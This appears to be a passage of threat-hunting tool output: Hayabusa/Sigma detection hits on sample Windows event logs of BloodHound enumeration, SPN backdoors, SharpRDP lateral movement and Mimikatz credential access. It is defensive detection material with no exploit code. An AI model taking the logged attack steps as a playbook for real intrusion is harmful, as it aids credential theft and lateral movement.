05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
+2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 
0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 
+09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 